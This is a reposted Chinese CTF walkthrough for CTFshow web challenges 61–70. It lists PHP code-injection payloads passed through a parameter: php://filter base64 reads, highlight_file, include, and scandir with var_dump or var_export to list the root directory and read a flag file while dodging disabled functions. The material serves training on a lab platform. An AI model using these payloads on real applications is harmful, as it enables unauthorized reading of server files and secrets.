WEB 入门 索引web61~65题解 web66题解原理 web67题解原理 web68题解原理 web69题解原理 web70题解原理 ctf - web
ctf - web入门
这几个题都和 web58 一样。可能内部禁用的函数不一样吧。但 payload 都差不多。不多解释了。
以下解法随便挑一个即可。可能不同题会有部分函数被禁。
payload1:
c=include "PHP://filter/read=convert.base64-encode/resource=flag.php";
payload2:
c=show_source('flag.php');
payload3:
c=file_get_contents('flag.php');
payload4:
c=highlight_file("flag.php");
题目没变化。
随便试一个函数。
根据提示,先扫一下根目录。
c=print_r(scandir('/'));
可得 payload:
c=highlight_file("/flag.txt");
PHP 中:
题目就不贴了。和前几题一模一样的。
区别在于,print_r()
函数被禁了。
那就用 var_dump()
函数。
c=var_dump(scandir('/'));
payload:
c=highlight_file("/flag.txt");
一上来就说 highlight_file() 函数被禁了。
先尝试扫一下根目录。
c=var_dump(scandir('/'));
那就使用 include() 函数将文件内容包含进来。
payload:
c=include("/flag.txt");
题目与 web68 一样。
但是 var_dump() 被禁了。
换一个函数即可。
c=var_export(scandir("/"));
payload:
c=include("/flag.txt");
看题,禁用了一堆函数。
但其实沿用 web69 的方法即可。
c=var_export(scandir("/"));
c=include("/flag.txt");
对这题来说没啥用的函数。
一笑出门去,千里落花风。
——《水调歌头 · 我饮不须劝》(宋)辛弃疾
来源地址:https://blog.csdn.net/KeepPromise/article/details/130448475
--结束END--
本文标题: 《CTFshow-Web入门》07. Web 61~70
本文链接: https://lsjlt.com/news/388209.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0